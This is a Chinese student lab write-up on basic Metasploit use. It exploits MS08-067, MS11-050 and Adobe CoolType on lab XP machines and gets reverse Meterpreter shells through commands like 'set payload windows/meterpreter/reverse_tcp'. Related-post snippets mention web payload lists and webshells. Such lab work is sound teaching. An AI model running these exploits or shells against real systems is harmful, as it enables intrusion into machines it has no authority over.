20145334赵文豪《网络攻防》 MSF基础应用

最新推荐文章于 2024-08-12 23:08:43 发布
最新推荐文章于 2024-08-12 23:08:43 发布
阅读量169 收藏
点赞数
文章标签: shell 操作系统
原文链接:http://www.cnblogs.com/bestizwh/p/6718787.html
版权

实践目标
掌握metasploit的基本应用方式
掌握常用的三种攻击方式的思路。

实验要求
一个主动攻击,如ms08_067
一个针对浏览器的攻击,如ms11_050
一个针对客户端的攻击,如Adobe
成功应用任何一个辅助模块

实验问答
用自己的话解释什么是exploit,payload,encode.
exploit是利用系统漏洞,相当于一个动态的过程。
payload是攻击载荷,用于实现对漏洞的攻击,是实现漏洞攻击最核心的代码。
encode是用于实验特征码伪装的编码,可以实现免杀

三个靶机真的很大很大很大,拷了半天!

MS08_067远程漏洞攻击实践:Shell

在kali终端中开启msfconsole。

输入命令search ms08_067,查看这个渗透模块
885896-20170416135042509-1272493947.png

输入命令show payloads会显示出有效的攻击载荷
885896-20170416135200962-2088908700.png

并且可以查看我们可以使用的载荷
885896-20170416135237181-1381475857.png

设置kali的ip地址
设置靶机的ip地址
最后进行渗透
885896-20170416135518431-1298718973.png

885896-20170416135740040-1911603116.png

MS08_067远程漏洞攻击实践:meterpreter

前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

设置payload:set payload windows/meterpreter/reverse_tcp

show options,查看需要设置的ip地址

885896-20170416140137212-138399568.png

ps查看进程

885896-20170416140423931-1991879335.png

meterpreter转shel

885896-20170416140817384-1505455503.png

MS11-050漏洞攻击
利用IE浏览器的渗透

确保我们的kali和xp系统能互相ping通,这个是非常重要的,xp系统作为靶机。必须关掉防火墙!!!!

885896-20170416141050087-370225552.png

进入msfconsole
885896-20170416141309024-988298406.png

show options查看需要设置的相关信息
885896-20170416141944477-726979451.png

设置SRVHOST和LHOST地址,并且监听,找到url
885896-20170416141517743-1710059388.png

在靶机IE上输入网址,并在靶机上查看信息,kali中显示一个session 1已经创建

输入命令sessions -i 1,开始连接
885896-20170416142245009-982950382.png

输入命令sessions -i 1,开始连接以后,攻击成功了,获取shell

885896-20170416142256118-330508015.png

Adobe阅读器渗透攻击

kali中启动msf,然后我们进入adobe_cooltype_sing
885896-20170416144925493-1865268013.png

配置IP地址和端口号之外,配置PDF文件,之后反向连接
885896-20170416145152993-1955295613.png

885896-20170416145230212-766812580.png

885896-20170416145239852-1197119683.png

转载于:https://www.cnblogs.com/bestizwh/p/6718787.html

angying5199
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayloadmsfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
网络攻防 第七周学习总结
weixin_30809333的博客
04-16 217
教材学习内容总结 第七章 Windows操作系统安全防护 Windows操作系统框架 Windows操作系统的发展与现状 Windows在桌面操作系统中占有非常高的市场份额,Windows XP系统在国内仍有大量的用户 Windows操作系统基本结构 1、Windows操作系统内核基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接...
2017-2018-2 20179317 《网络攻防技术》第七周学习心得体会
weixin_30493401的博客
04-22 956
教材学习内容总结 课本第七章主要围绕windows操作系统安全攻防技术进行讲述,教材中主要涉及的攻击内容如下: Windows操作系统的基本结构 运行于处理器特权模式的操作系统内核 运行在处理器非特权模式的用户空间代码 采用宏内核模式来进行构架 Windows操作系统内核的基本模块包括如下 Windows执行体 Windows内核体 设备驱动...
渗透测试实验(《网络攻防技术与实践》与《Metasploit渗透测试指南》读书实验)
ccx_john的专栏
09-29 3068
书籍名称: 《网络攻防技术与实践》 《Metasploit渗透测试指南》 此次为读书过程中的实验练习,攻击机是自身的一台windows xp sp3虚拟机,metasploit环境,靶机为一个为网络攻防技术与实践提供的一台未打过补丁的英文windows xp虚拟机。我的笔记本性能不是很好,双开两个虚拟机在运行metasploit的时候还是比较卡的。 第一次的练习,难度比较低,靶
WEB漏洞测试payload整理
nextdoor6的博客
12-14 9489
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。 [反射型xss] [在html形成] "'>document.title="[random]"; document.title="[random]"; [在js形成] document.title="[random]";// ;document.titl
Metasploit的使用 - payloads
lendq的Blog
05-01 1050
payload—攻击载荷 用来建立 destination 与 host 稳定连接,可返回shell,也可以进行程序注入等。 类型: singles:独立载荷,可直接植入目标系统并执行相应的程序 相当于 结合 下面2和3的,但是执行代码是固定的,不灵活,也不建立任何连接 如:shell_bind_tcp这个payload stagers:传输器载荷,用于目标机与攻击机之...
网络安全之web攻防 逻辑漏洞浅析
网络安全领域优质创作者
11-28 573
逻辑漏洞是一种比较常见的漏洞,在漏洞挖掘过程中有时也很容易遇见。 通常漏洞有:任意密码修改,支付漏洞,密码找回,越权等 注册处常见的漏洞有: 1.任意用户注册 挖掘方法: 一般用a手机号接受短信,然后再用b接收,发现验证码一样,可再用其他任意手机号注册 攻击者知道被攻击用户的手机号码,获取短信验证码,抓包在数据包中看到用户收到的重置用的短信验证码。 2.尝试重复用户名等 登录处常见...
20189311《网络攻防》第七周作业
aipu8202的博客
04-14 228
1.第六周作业 第六周博客链接 2.黑帽子6、9章代码 Burp模糊测试 利用网站内容生成密码字典 基于浏览器的中间人攻击 报错即解决: 3.《网络攻防技术》第七章 2.1 Windows操作系统的基本结构 Windows操作系统内核的基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支...
MongoDB | MongoDB 终端查询
weixin_44435110的博客
08-12 465
MongoDB 是一个高性能、易扩展的文档型 NoSQL 数据库。本文档将指导你如何使用 MongoDB 的命令行工具`mongo` shell来查询存储在MongoDB数据库中的数据。
UnixBench分数计算与多进程测试
qq_39280836的博客
08-08 191
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 906
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
VB6 SHELL命令中有引号,怎么写?
xinhuanjieyi的博客
08-11 261
需要在命令中包含引号,一种简单的方法是将整个命令字符串用双引号包围起来,并在需要的地方内部使用单引号(如果外部系统或命令支持)。但更常见的是,继续使用双引号,并确保内部的双引号被正确地处理。在VB6中,你可以通过连续使用两个双引号("")来表示字符串中的一个双引号。例如,如果你需要执行一个命令,该命令要求文件路径作为参数,并且这个路径中包含空格和引号,你可以这样做:注意,在cmd。
【busybox记录】【shell指令】uname
最新发布
44083579的博客
08-12 283
uname指令用法
shell编程练习(三)
2301_77279557的博客
08-08 244
常见的shell编程以及自动化脚本
Linux运维_Bash脚本_二进制文件部署Docker-CE-26.1.4
goufeng93的博客
08-09 398
Linux运维 Bash脚本 二进制文件部署Docker-CE-26.1.4。
Linux Shell编程--数组
小李学不完的博客
08-09 298
Shell 脚本中的数组允许你存储多个值,并可以通过索引访问它们。Shell 中的数组是一维的。Shell中的数组虽然功能有限,但通过一些技巧和方法,仍然可以有效地进行数组操作和处理。
无字母数字webshell之命令执行
weixin_71398630的博客
08-11 352
那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。所有方法,都用到了PHP中的变量,需要对变量进行变形、异或、取反等操作,最后动态执行函数。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母、数字、
win设置exe程序自启动
半两八斤的博客
08-07 199
windows系统设置exe程序开机自启动
FTP.JBoss,Ldap,Rsync未授权访问漏洞(附带修复方法)
C233333235的博客
08-10 806
FTP 弱⼝令或匿名登录漏洞,⼀般指使⽤ FTP 的⽤户启⽤了匿名登录功能,或系统⼝令的⻓度太短、复杂度不够、仅包含数字、或仅包含字⺟等,容易被⿊客攻击,发⽣恶意⽂件上传或更严重的⼊侵⾏为。
shell编程:利用SSH实现分布式应用的一键安装部署①(多主机执行指令函数封装、日志输出、关闭防火墙、传输文件函数封装)
m0_60125201的博客
08-08 356
多主机执行指令函数封装、日志输出、关闭防火墙、传输文件函数封装
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值